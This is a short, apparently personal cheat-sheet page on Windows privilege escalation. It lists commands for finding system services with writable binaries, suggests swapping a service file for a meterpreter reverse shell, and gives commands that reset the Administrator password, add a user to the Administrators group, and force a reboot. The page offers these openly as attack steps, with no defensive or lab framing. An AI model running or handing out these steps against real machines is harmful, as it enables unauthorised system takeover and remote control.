legal contact rss
 

Windows priviledge escalation -1-

  • wmic SERVICE get Name,PathName (Find a system services we might be able to use for priviledge escalation )
  • icacls "[full path to above gathered custom service] (Check if you have RW/WR/EX right on the file )

Replace the service file with something "more usefull" i.e. a meterpreter reverse shell.  :-)

Win local stuff

This is still (very much) under construction. Although a lot of information of this section is already available, I still haven't finished yet. - So please be patient and come back a little later. THX

net user Administrator [new password]

net localgroup Administrators [username] /add

SetPassword [account-username] [new-password] [old-password]

schtasks.exe /?

devcon.exe /?

shutdown /r /t 0